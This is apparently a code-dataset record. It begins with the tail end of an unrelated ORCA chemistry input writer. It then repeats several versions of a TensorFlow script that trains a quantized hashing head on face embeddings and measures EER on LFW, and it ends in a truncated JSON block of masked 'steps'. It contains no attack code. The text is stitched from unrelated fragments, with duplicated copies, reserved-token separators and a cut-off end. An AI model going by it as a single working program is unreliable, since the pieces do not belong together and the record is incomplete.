\"+values[\"nproc\"]+\" \\n\")\n com_f.write(\"end\\n\")\n\n com_f.write(\"%method\\n\") ## CHECK\n com_f.write(\" IntAcc 7.0\\n\")\n \n if values[\"optdiis\"] == \"true\":\n com_f.write(\" Z_solver DIIS\\n\")\n com_f.write(\" Z_MaxIter 300\\n\")\n \n if correlated == \"true\":\n uniq_atom_res = uniqatoms(sym)\n if values[\"ALLELE\"] == \"true\": ### CHECK!!!!\n for iat in range(int(uniq_atom_res[\"N_ua\"])):\n pre1 = uniq_atom_res[\"uniq_sym\"]\n at_pr1 = pre1[iat]\n com_f.write(\" NewNCore \" + at_pr1 + \" \" + \" 0 end\\n\")\n else:\n for iat in range(int(uniq_atom_res[\"N_ua\"])):\n pre1 = uniq_atom_res[\"uniq_sym\"]\n at_pr1 = pre1[iat]\n NFC_res = NFC(at_pr1)\n com_f.write(\" NewNCore \" + at_pr1 + \" \" + str(NFC_res) +\" end\\n\")\n \n com_f.write(\"end\\n\")\n \n if optfreq == \"true\":\n com_f.write(\"%geom\\n\")\n if values[\"MGGA\"] == \"true\":\n com_f.write(\" Calc_Hess true; NumHess true\\n\")\n else:\n com_f.write(\" Calc_Hess true\\n\")\n com_f.write(\" Recalc_Hess \" + str(values[\"iterhess\"]) +\" \\n\") ## revisit !!!! CHECK!!! IMPORTANT\n com_f.write(\"end\\n\")\n com_f.write(\"%freq Temp 273.15, 298.15\\n\")\n com_f.write(\"end\\n\")\n if custombasis == \"true\":\n com_f.write(\"%basis \\n\")\n \n if custombasis == \"true\":\n uniq_atom_res = uniqatoms(sym)\n fname = basis\n if Nat == 1: \n orca_printbas(fname, sym[0]) \n else:\n for iat1 in range(int(uniq_atom_res[\"N_ua\"])):\n orca_printbas(fname, uniq_atom_res[\"uniq_sym\"][iat1]) # GTBAS1 C \n with open(\"input.com\", \"a\") as com_f:\n com_f.write(\"end\\n\")\n\n os.system(values[\"orca_exe\"] + \" input.com > input.out\")\n os.system(\"cat input.com >> ORCA.inp\")\n os.system(\"cat input.out >> ORCA.out\")\n #os.system(\"rm -f input*\")\n####### orca_run - E\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'

    # --- Hyper-parameters -------------------------------------------------
    total_iteration = 300000
    m = 512          # hash-code length (output dimensions)
    q = 32           # quantization levels per dimension
    lam = 0.01       # weight of the code-balance term c_ij
    beta = 1.0       # softmax temperature of the soft quantizer
    margin = 0.5     # angular margin applied in the pairwise loss
    s = 32           # logit scale factor
    batch_size = 256
    class_num = 1595
    train_dataset = 'FS'
    eval_dataset = 'LFW'
    args = get_args()  # CLI args (not referenced below)

    # --- Training data: pre-extracted 512-d embeddings from tfrecords -----
    image, label, iterator = {}, {}, {}
    if train_dataset == 'YTF':
        image['train'], label['train'], iterator['train'] = load_ytf_data(
            batch_size, 'train')
    elif train_dataset == 'FS':
        image['train'], label['train'], iterator['train'] = load_fs_data(
            batch_size, 'train')
    else:
        print('Select proper dataset')

    # --- Evaluation data ---------------------------------------------------
    wrapper = wrapper_basicImg(dataset=eval_dataset)
    if eval_dataset == 'YTF':
        image['gallery'], label['gallery'], iterator['gallery'] = \
            load_ytf_data(batch_size, 'train', eval=True)
        image['test'], label['test'], iterator['test'] = load_ytf_data(
            batch_size, 'test')
    elif eval_dataset == 'LFW':
        image['gallery'], label['gallery'], iterator['gallery'] = \
            load_lfw_data(batch_size, 'gallery')
        image['test'], label['test'], iterator['test'] = load_lfw_data(
            batch_size, 'probe')

    # --- Graph inputs -------------------------------------------------------
    embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512],
                                      dtype=tf.float32)
    labels = tf.placeholder(name='label', shape=[None], dtype=tf.int32)

    global_step = tf.Variable(0, trainable=False)
    starter_learning_rate = 0.003
    learning_rate = tf.train.exponential_decay(
        starter_learning_rate, global_step, total_iteration, 0.96)

    # --- DIom hashing head: 3 FC layers + soft quantization -----------------
    with tf.variable_scope('DIom'):
        fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')
        fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')
        fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')
        h_k = tf.reshape(fc3, [-1, m, q])
        h_k = tf.nn.softmax(beta * h_k, axis=2)
        # Soft-argmax: expected quantization index in [1, q] per dimension.
        index_matrix = tf.range(1, q + 1, dtype=tf.float32)
        h = tf.reduce_sum(h_k * index_matrix, axis=2)
        h = tf.reshape(h, [-1, m])
        h_norm = tf.math.l2_normalize(h, axis=1)

    # --- Pairwise margin loss ------------------------------------------------
    # l[i, j] == 1 iff samples i and j share an identity (flattened to a
    # column so every ordered pair in the batch becomes one training pair).
    l = tf.one_hot(labels, class_num)
    l = tf.matmul(l, tf.transpose(l))
    l_float = tf.cast(l, tf.float32)
    l = tf.reshape(tf.clip_by_value(l_float, 0.0, 1.0), (-1, 1))
    label_int = tf.cast(tf.squeeze(l, 1), tf.int32)
    inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))
    cos_t = tf.clip_by_value(inner_prod, -1.0, 1.0 - 1e-06)
    theta = tf.math.acos(cos_t)
    sin_t = tf.math.sin(theta)
    cos_mt = tf.math.cos(theta + margin)
    sin_mt = tf.math.sin(theta + margin)
    # Genuine pairs see the margin-shifted cosine; impostor pairs the
    # margin-shifted sine, both scaled by s into a 2-class logit.
    logit = l * s * tf.concat([sin_t, cos_mt], 1) \
        + (1 - l) * s * tf.concat([sin_mt, cos_t], 1)
    l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(
        logits=logit, labels=label_int)
    # Code-balance regularizer: mean code value should sit at the mid level.
    c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)
    l_ij = tf.reduce_mean(l_ij_logit)
    c_ij = tf.reduce_mean(c_ij)
    loss = l_ij + lam * c_ij
    gradient = tf.gradients(loss, sin_t)  # kept for debugging/inspection

    # --- Optimizer: train only the DIom head variables ----------------------
    t_vars = tf.global_variables()
    train_vars = [var for var in t_vars if 'DIom' in var.name]
    opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(
        loss, var_list=train_vars, global_step=global_step)

    with tf.Session() as sess:
        tf.global_variables_initializer().run()
        sess.run(iterator['train'].initializer)
        iteration = sess.run(global_step)
        t_opt = [opt_t, loss, l_ij, c_ij]
        start_time = time.time()
        while iteration != total_iteration:
            img, lbl = sess.run([image['train'], label['train']])
            train_dict = {embedding_tensor: img, labels: lbl}
            _, train_loss, loss_l, loss_c = sess.run(t_opt,
                                                     feed_dict=train_dict)
            iteration += 1
            if iteration % 10000 == 0:
                # --- Periodic EER evaluation over verification pairs -------
                dist_list = []
                label_list = []
                code_list = []
                while wrapper.samples_left > 0:
                    imgs, lbls = wrapper.get_next_batch(100)
                    imgs = np.reshape(imgs, [-1, 512])
                    eer_dict = {embedding_tensor: imgs}
                    code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)
                    # Consecutive code pairs form one verification trial;
                    # similarity is the inner product of the pair.
                    code = np.reshape(code, [-1, 2, m])
                    distance = np.sum(np.prod(code, axis=1), axis=1)
                    # BUGFIX: was `dist_list == []`, which performs a NumPy
                    # elementwise comparison once dist_list is an ndarray.
                    if len(dist_list) == 0:
                        dist_list = distance
                        label_list = lbls
                        code_list = int_code
                    else:
                        dist_list = np.concatenate((dist_list, distance),
                                                   axis=0)
                        label_list = np.concatenate((label_list, lbls),
                                                    axis=0)
                        code_list = np.concatenate((code_list, int_code),
                                                   axis=0)
                # Rewind the wrapper for the next evaluation round.
                wrapper.samples_left = np.size(wrapper.labels, axis=0)
                wrapper.next_batch_pointer = 0
                fpr, tpr, threshold = roc_curve(label_list, dist_list,
                                                pos_label=1)
                fnr = 1 - tpr
                # EER: operating point where false-negative ~= false-positive.
                eer = fpr[np.nanargmin(np.absolute(fnr - fpr))]
                # Histogram of the (rounded) produced code values.
                code_arr = np.around(code_list)
                count_arr = []
                for i in range(q):
                    count_arr.append(np.count_nonzero(code_arr == i + 1))
                plt.clf()
                plt.bar(range(1, q + 1), count_arr)
                plt.savefig('./plt/code_' + str(iteration) + '.png')
                time_taken = time.time() - start_time
                MAP = 0  # MAP evaluation disabled; printed as a placeholder
                print(
                    '[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f'
                    % (iteration, train_loss, loss_l, loss_c, MAP, eer,
                    time_taken))
                start_time = time.time()
<|reserved_special_token_1|>
import tensorflow as tf
import numpy as np
import time
import os
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
from src.model import get_args
from src.funcs import linear
from src.youtubeface import load_ytf_data
from src.lfw import load_lfw_data
from src.facescrub import load_fs_data
from src.wrapper_basicImg import wrapper_basicImg

if __name__ == '__main__':
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'

    # --- Hyper-parameters -------------------------------------------------
    total_iteration = 300000
    m = 512          # hash-code length (output dimensions)
    q = 32           # quantization levels per dimension
    lam = 0.01       # weight of the code-balance term c_ij
    beta = 1.0       # softmax temperature of the soft quantizer
    margin = 0.5     # angular margin applied in the pairwise loss
    s = 32           # logit scale factor
    batch_size = 256
    class_num = 1595
    train_dataset = 'FS'
    eval_dataset = 'LFW'
    args = get_args()  # CLI args (not referenced below)

    # --- Training data: pre-extracted 512-d embeddings from tfrecords -----
    image, label, iterator = {}, {}, {}
    if train_dataset == 'YTF':
        image['train'], label['train'], iterator['train'] = load_ytf_data(
            batch_size, 'train')
    elif train_dataset == 'FS':
        image['train'], label['train'], iterator['train'] = load_fs_data(
            batch_size, 'train')
    else:
        print('Select proper dataset')

    # --- Evaluation data ---------------------------------------------------
    wrapper = wrapper_basicImg(dataset=eval_dataset)
    if eval_dataset == 'YTF':
        image['gallery'], label['gallery'], iterator['gallery'] = \
            load_ytf_data(batch_size, 'train', eval=True)
        image['test'], label['test'], iterator['test'] = load_ytf_data(
            batch_size, 'test')
    elif eval_dataset == 'LFW':
        image['gallery'], label['gallery'], iterator['gallery'] = \
            load_lfw_data(batch_size, 'gallery')
        image['test'], label['test'], iterator['test'] = load_lfw_data(
            batch_size, 'probe')

    # --- Graph inputs -------------------------------------------------------
    embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512],
                                      dtype=tf.float32)
    labels = tf.placeholder(name='label', shape=[None], dtype=tf.int32)

    global_step = tf.Variable(0, trainable=False)
    starter_learning_rate = 0.003
    learning_rate = tf.train.exponential_decay(
        starter_learning_rate, global_step, total_iteration, 0.96)

    # --- DIom hashing head: 3 FC layers + soft quantization -----------------
    with tf.variable_scope('DIom'):
        fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')
        fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')
        fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')
        h_k = tf.reshape(fc3, [-1, m, q])
        h_k = tf.nn.softmax(beta * h_k, axis=2)
        # Soft-argmax: expected quantization index in [1, q] per dimension.
        index_matrix = tf.range(1, q + 1, dtype=tf.float32)
        h = tf.reduce_sum(h_k * index_matrix, axis=2)
        h = tf.reshape(h, [-1, m])
        h_norm = tf.math.l2_normalize(h, axis=1)

    # --- Pairwise margin loss ------------------------------------------------
    # l[i, j] == 1 iff samples i and j share an identity (flattened to a
    # column so every ordered pair in the batch becomes one training pair).
    l = tf.one_hot(labels, class_num)
    l = tf.matmul(l, tf.transpose(l))
    l_float = tf.cast(l, tf.float32)
    l = tf.reshape(tf.clip_by_value(l_float, 0.0, 1.0), (-1, 1))
    label_int = tf.cast(tf.squeeze(l, 1), tf.int32)
    inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))
    cos_t = tf.clip_by_value(inner_prod, -1.0, 1.0 - 1e-06)
    theta = tf.math.acos(cos_t)
    sin_t = tf.math.sin(theta)
    cos_mt = tf.math.cos(theta + margin)
    sin_mt = tf.math.sin(theta + margin)
    # Genuine pairs see the margin-shifted cosine; impostor pairs the
    # margin-shifted sine, both scaled by s into a 2-class logit.
    logit = l * s * tf.concat([sin_t, cos_mt], 1) \
        + (1 - l) * s * tf.concat([sin_mt, cos_t], 1)
    l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(
        logits=logit, labels=label_int)
    # Code-balance regularizer: mean code value should sit at the mid level.
    c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)
    l_ij = tf.reduce_mean(l_ij_logit)
    c_ij = tf.reduce_mean(c_ij)
    loss = l_ij + lam * c_ij
    gradient = tf.gradients(loss, sin_t)  # kept for debugging/inspection

    # --- Optimizer: train only the DIom head variables ----------------------
    t_vars = tf.global_variables()
    train_vars = [var for var in t_vars if 'DIom' in var.name]
    opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(
        loss, var_list=train_vars, global_step=global_step)

    with tf.Session() as sess:
        tf.global_variables_initializer().run()
        sess.run(iterator['train'].initializer)
        iteration = sess.run(global_step)
        t_opt = [opt_t, loss, l_ij, c_ij]
        start_time = time.time()
        while iteration != total_iteration:
            img, lbl = sess.run([image['train'], label['train']])
            train_dict = {embedding_tensor: img, labels: lbl}
            _, train_loss, loss_l, loss_c = sess.run(t_opt,
                                                     feed_dict=train_dict)
            iteration += 1
            if iteration % 10000 == 0:
                # --- Periodic EER evaluation over verification pairs -------
                dist_list = []
                label_list = []
                code_list = []
                while wrapper.samples_left > 0:
                    imgs, lbls = wrapper.get_next_batch(100)
                    imgs = np.reshape(imgs, [-1, 512])
                    eer_dict = {embedding_tensor: imgs}
                    code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)
                    # Consecutive code pairs form one verification trial;
                    # similarity is the inner product of the pair.
                    code = np.reshape(code, [-1, 2, m])
                    distance = np.sum(np.prod(code, axis=1), axis=1)
                    # BUGFIX: was `dist_list == []`, which performs a NumPy
                    # elementwise comparison once dist_list is an ndarray.
                    if len(dist_list) == 0:
                        dist_list = distance
                        label_list = lbls
                        code_list = int_code
                    else:
                        dist_list = np.concatenate((dist_list, distance),
                                                   axis=0)
                        label_list = np.concatenate((label_list, lbls),
                                                    axis=0)
                        code_list = np.concatenate((code_list, int_code),
                                                   axis=0)
                # Rewind the wrapper for the next evaluation round.
                wrapper.samples_left = np.size(wrapper.labels, axis=0)
                wrapper.next_batch_pointer = 0
                fpr, tpr, threshold = roc_curve(label_list, dist_list,
                                                pos_label=1)
                fnr = 1 - tpr
                # EER: operating point where false-negative ~= false-positive.
                eer = fpr[np.nanargmin(np.absolute(fnr - fpr))]
                # Histogram of the (rounded) produced code values.
                code_arr = np.around(code_list)
                count_arr = []
                for i in range(q):
                    count_arr.append(np.count_nonzero(code_arr == i + 1))
                plt.clf()
                plt.bar(range(1, q + 1), count_arr)
                plt.savefig('./plt/code_' + str(iteration) + '.png')
                time_taken = time.time() - start_time
                MAP = 0  # MAP evaluation disabled; printed as a placeholder
                print(
                    '[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f'
                    % (iteration, train_loss, loss_l, loss_c, MAP, eer,
                    time_taken))
                start_time = time.time()
<|reserved_special_token_1|>
import tensorflow as tf
import numpy as np
import time
import os
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt

from src.model import get_args
from src.funcs import linear
from src.youtubeface import load_ytf_data
from src.lfw import load_lfw_data
from src.facescrub import load_fs_data
from src.wrapper_basicImg import wrapper_basicImg

if __name__ == '__main__':
    os.environ["CUDA_VISIBLE_DEVICES"] = '0'

    # Hyper-parameters.
    total_iteration = 300000
    m = 512          # hash-code length (output dimensions)
    q = 32           # quantization levels per dimension
    lam = 0.01       # weight of the code-balance term c_ij
    beta = 1.        # softmax temperature of the soft quantizer
    margin = 0.5     # angular margin applied in the pairwise loss
    s = 32           # logit scale factor
    batch_size = 256
    class_num = 1595
    train_dataset = 'FS'
    eval_dataset = "LFW"

    args = get_args()  # CLI args (not referenced below)

    ### Get image and label from tfrecord
    image, label, iterator = {}, {}, {}
    if train_dataset == 'YTF':
        image['train'], label['train'], iterator['train'] = load_ytf_data(batch_size, 'train')
    elif train_dataset == 'FS':
        image['train'], label['train'], iterator['train'] = load_fs_data(batch_size, 'train')
    else:
        print("Select proper dataset")

    ### Get evaluation dataset. Wrapper
    wrapper = wrapper_basicImg(dataset=eval_dataset)
    if eval_dataset == 'YTF':
        image['gallery'], label['gallery'], iterator['gallery'] = load_ytf_data(batch_size, 'train', eval=True)
        image['test'], label['test'], iterator['test'] = load_ytf_data(batch_size, 'test')
    elif eval_dataset == 'LFW':
        image['gallery'], label['gallery'], iterator['gallery'] = load_lfw_data(batch_size, 'gallery')
        image['test'], label['test'], iterator['test'] = load_lfw_data(batch_size, 'probe')

    ### Backbone network (Arcface) embeddings are fed in pre-computed (512-d).
    embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512], dtype=tf.float32)
    labels = tf.placeholder(name='label', shape=[None, ], dtype=tf.int32)

    ### Global step & learning rate
    global_step = tf.Variable(0, trainable=False)
    starter_learning_rate = 0.003
    learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step, total_iteration, 0.96)

    ### DIom hashing head: 3 FC layers + soft quantization.
    with tf.variable_scope('DIom'):
        fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')
        fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')
        fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')
        h_k = tf.reshape(fc3, [-1, m, q])
        h_k = tf.nn.softmax(beta * h_k, axis=2)
        # Soft-argmax: expected quantization index in [1, q] per dimension.
        index_matrix = tf.range(1, q + 1, dtype=tf.float32)
        h = tf.reduce_sum(h_k * index_matrix, axis=2)
        h = tf.reshape(h, [-1, m])
        h_norm = tf.math.l2_normalize(h, axis=1)

    ### Loss function: pairwise angular-margin cross-entropy.
    # l[i, j] == 1 iff samples i and j share an identity (flattened to a
    # column so every ordered pair in the batch becomes one training pair).
    l = tf.one_hot(labels, class_num)
    l = tf.matmul(l, tf.transpose(l))
    l_float = tf.cast(l, tf.float32)
    l = tf.reshape(tf.clip_by_value(l_float, 0., 1.), (-1, 1))
    label_int = tf.cast(tf.squeeze(l, 1), tf.int32)

    inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))
    cos_t = tf.clip_by_value(inner_prod, -1., 1. - 1e-6)
    theta = tf.math.acos(cos_t)
    sin_t = tf.math.sin(theta)
    cos_mt = tf.math.cos(theta + margin)
    sin_mt = tf.math.sin(theta + margin)

    # Genuine pairs see the margin-shifted cosine; impostor pairs the
    # margin-shifted sine, both scaled by s into a 2-class logit.
    logit = l * s * (tf.concat([sin_t, cos_mt], 1)) + (1 - l) * s * (tf.concat([sin_mt, cos_t], 1))
    l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logit, labels=label_int)
    # Code-balance regularizer: mean code value should sit at the mid level.
    c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)

    l_ij = tf.reduce_mean(l_ij_logit)
    c_ij = tf.reduce_mean(c_ij)
    loss = l_ij + lam * c_ij
    gradient = tf.gradients(loss, sin_t)  # kept for debugging/inspection

    ### Optimizer: train only the DIom head variables.
    t_vars = tf.global_variables()
    train_vars = [var for var in t_vars if 'DIom' in var.name]
    opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(loss, var_list=train_vars, global_step=global_step)

    with tf.Session() as sess:
        tf.global_variables_initializer().run()
        sess.run(iterator['train'].initializer)

        ### Training
        iteration = sess.run(global_step)
        t_opt = [opt_t, loss, l_ij, c_ij]
        start_time = time.time()
        while iteration != total_iteration:
            img, lbl = sess.run([image['train'], label['train']])
            train_dict = {
                embedding_tensor: img,
                labels: lbl
            }
            _, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=train_dict)
            iteration += 1

            if iteration % 10000 == 0:
                ### Calculate EER over the evaluation verification pairs.
                # (The gallery/probe MAP evaluation that used to live here
                # was disabled; MAP below is a printed placeholder.)
                dist_list = []
                label_list = []
                code_list = []
                while wrapper.samples_left > 0:
                    imgs, lbls = wrapper.get_next_batch(100)
                    imgs = np.reshape(imgs, [-1, 512])

                    eer_dict = {
                        embedding_tensor: imgs
                    }
                    code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)
                    # Consecutive code pairs form one verification trial;
                    # similarity is the inner product of the pair.
                    code = np.reshape(code, [-1, 2, m])
                    distance = np.sum(np.prod(code, axis=1), axis=1)

                    # BUGFIX: was `dist_list == []`, which performs a NumPy
                    # elementwise comparison once dist_list is an ndarray.
                    if len(dist_list) == 0:
                        dist_list = distance
                        label_list = lbls
                        code_list = int_code
                    else:
                        dist_list = np.concatenate((dist_list, distance), axis=0)
                        label_list = np.concatenate((label_list, lbls), axis=0)
                        code_list = np.concatenate((code_list, int_code), axis=0)
                # Rewind the wrapper for the next evaluation round.
                wrapper.samples_left = np.size(wrapper.labels, axis=0)
                wrapper.next_batch_pointer = 0

                fpr, tpr, threshold = roc_curve(label_list, dist_list, pos_label=1)
                fnr = 1 - tpr
                # EER: operating point where false-negative ~= false-positive.
                eer = fpr[np.nanargmin(np.absolute((fnr - fpr)))]

                ### Code frequency histogram of the (rounded) code values.
                code_arr = np.around(code_list)
                count_arr = []
                for i in range(q):
                    count_arr.append(np.count_nonzero(code_arr == i + 1))

                plt.clf()
                plt.bar(range(1, q + 1), count_arr)
                plt.savefig('./plt/code_' + str(iteration) + '.png')

                time_taken = time.time() - start_time
                MAP = 0
                print("[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f"
                      % (iteration, train_loss, loss_l, loss_c, MAP, eer, time_taken))
                start_time = time.time()

    # TODO(review): model checkpointing (tf.train.Saver over the DIom
    # variables) was present here as commented-out code; restore if the
    # trained head needs to be persisted.
|
flexible
|
{
"blob_id": "459dd9302f7100ad02119cc94b735b19287f21e5",
"index": 5956,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n total_iteration = 300000\n m = 512\n q = 32\n lam = 0.01\n beta = 1.0\n margin = 0.5\n s = 32\n batch_size = 256\n class_num = 1595\n train_dataset = 'FS'\n eval_dataset = 'LFW'\n args = get_args()\n image, label, iterator = {}, {}, {}\n if train_dataset == 'YTF':\n image['train'], label['train'], iterator['train'] = load_ytf_data(\n batch_size, 'train')\n elif train_dataset == 'FS':\n image['train'], label['train'], iterator['train'] = load_fs_data(\n batch_size, 'train')\n else:\n print('Select proper dataset')\n wrapper = wrapper_basicImg(dataset=eval_dataset)\n if eval_dataset == 'YTF':\n image['gallery'], label['gallery'], iterator['gallery'\n ] = load_ytf_data(batch_size, 'train', eval=True)\n image['test'], label['test'], iterator['test'] = load_ytf_data(\n batch_size, 'test')\n elif eval_dataset == 'LFW':\n image['gallery'], label['gallery'], iterator['gallery'\n ] = load_lfw_data(batch_size, 'gallery')\n image['test'], label['test'], iterator['test'] = load_lfw_data(\n batch_size, 'probe')\n embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512],\n dtype=tf.float32)\n labels = tf.placeholder(name='label', shape=[None], dtype=tf.int32)\n global_step = tf.Variable(0, trainable=False)\n starter_learning_rate = 0.003\n learning_rate = tf.train.exponential_decay(starter_learning_rate,\n global_step, total_iteration, 0.96)\n with tf.variable_scope('DIom'):\n fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')\n fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')\n fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')\n h_k = tf.reshape(fc3, [-1, m, q])\n h_k = tf.nn.softmax(beta * h_k, axis=2)\n index_matrix = tf.range(1, q + 1, dtype=tf.float32)\n h = tf.reduce_sum(h_k * index_matrix, axis=2)\n h = tf.reshape(h, [-1, m])\n h_norm = tf.math.l2_normalize(h, axis=1)\n l = tf.one_hot(labels, class_num)\n l = tf.matmul(l, tf.transpose(l))\n l_float = tf.cast(l, 
tf.float32)\n l = tf.reshape(tf.clip_by_value(l_float, 0.0, 1.0), (-1, 1))\n label_int = tf.cast(tf.squeeze(l, 1), tf.int32)\n inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))\n cos_t = tf.clip_by_value(inner_prod, -1.0, 1.0 - 1e-06)\n theta = tf.math.acos(cos_t)\n sin_t = tf.math.sin(theta)\n cos_mt = tf.math.cos(theta + margin)\n sin_mt = tf.math.sin(theta + margin)\n logit = l * s * tf.concat([sin_t, cos_mt], 1) + (1 - l) * s * tf.concat([\n sin_mt, cos_t], 1)\n l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=\n logit, labels=label_int)\n c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)\n l_ij = tf.reduce_mean(l_ij_logit)\n c_ij = tf.reduce_mean(c_ij)\n loss = l_ij + lam * c_ij\n gradient = tf.gradients(loss, sin_t)\n t_vars = tf.global_variables()\n train_vars = [var for var in t_vars if 'DIom' in var.name]\n opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(\n loss, var_list=train_vars, global_step=global_step)\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n sess.run(iterator['train'].initializer)\n iteration = sess.run(global_step)\n t_opt = [opt_t, loss, l_ij, c_ij]\n start_time = time.time()\n while iteration != total_iteration:\n img, lbl = sess.run([image['train'], label['train']])\n train_dict = {embedding_tensor: img, labels: lbl}\n _, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=\n train_dict)\n iteration += 1\n if iteration % 10000 == 0:\n dist_list = []\n label_list = []\n code_list = []\n while wrapper.samples_left > 0:\n imgs, lbls = wrapper.get_next_batch(100)\n imgs = np.reshape(imgs, [-1, 512])\n eer_dict = {embedding_tensor: imgs}\n code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)\n code = np.reshape(code, [-1, 2, m])\n distance = np.sum(np.prod(code, axis=1), axis=1)\n if dist_list == []:\n dist_list = distance\n label_list = lbls\n code_list = int_code\n else:\n dist_list = np.concatenate((dist_list, distance),\n axis=0)\n 
label_list = np.concatenate((label_list, lbls), axis=0)\n code_list = np.concatenate((code_list, int_code),\n axis=0)\n wrapper.samples_left = np.size(wrapper.labels, axis=0)\n wrapper.next_batch_pointer = 0\n fpr, tpr, threshold = roc_curve(label_list, dist_list,\n pos_label=1)\n fnr = 1 - tpr\n eer = fpr[np.nanargmin(np.absolute(fnr - fpr))]\n code_arr = np.around(code_list)\n count_arr = []\n for i in range(q):\n count_arr.append(np.count_nonzero(code_arr == i + 1))\n plt.clf()\n plt.bar(range(1, q + 1), count_arr)\n plt.savefig('./plt/code_' + str(iteration) + '.png')\n time_taken = time.time() - start_time\n MAP = 0\n print(\n '[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f'\n % (iteration, train_loss, loss_l, loss_c, MAP, eer,\n time_taken))\n start_time = time.time()\n",
"step-3": "import tensorflow as tf\nimport numpy as np\nimport time\nimport os\nfrom sklearn.metrics import roc_curve\nimport matplotlib.pyplot as plt\nfrom src.model import get_args\nfrom src.funcs import linear\nfrom src.youtubeface import load_ytf_data\nfrom src.lfw import load_lfw_data\nfrom src.facescrub import load_fs_data\nfrom src.wrapper_basicImg import wrapper_basicImg\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n total_iteration = 300000\n m = 512\n q = 32\n lam = 0.01\n beta = 1.0\n margin = 0.5\n s = 32\n batch_size = 256\n class_num = 1595\n train_dataset = 'FS'\n eval_dataset = 'LFW'\n args = get_args()\n image, label, iterator = {}, {}, {}\n if train_dataset == 'YTF':\n image['train'], label['train'], iterator['train'] = load_ytf_data(\n batch_size, 'train')\n elif train_dataset == 'FS':\n image['train'], label['train'], iterator['train'] = load_fs_data(\n batch_size, 'train')\n else:\n print('Select proper dataset')\n wrapper = wrapper_basicImg(dataset=eval_dataset)\n if eval_dataset == 'YTF':\n image['gallery'], label['gallery'], iterator['gallery'\n ] = load_ytf_data(batch_size, 'train', eval=True)\n image['test'], label['test'], iterator['test'] = load_ytf_data(\n batch_size, 'test')\n elif eval_dataset == 'LFW':\n image['gallery'], label['gallery'], iterator['gallery'\n ] = load_lfw_data(batch_size, 'gallery')\n image['test'], label['test'], iterator['test'] = load_lfw_data(\n batch_size, 'probe')\n embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512],\n dtype=tf.float32)\n labels = tf.placeholder(name='label', shape=[None], dtype=tf.int32)\n global_step = tf.Variable(0, trainable=False)\n starter_learning_rate = 0.003\n learning_rate = tf.train.exponential_decay(starter_learning_rate,\n global_step, total_iteration, 0.96)\n with tf.variable_scope('DIom'):\n fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')\n fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')\n fc3 = linear(tf.nn.relu(fc2), m * q, 
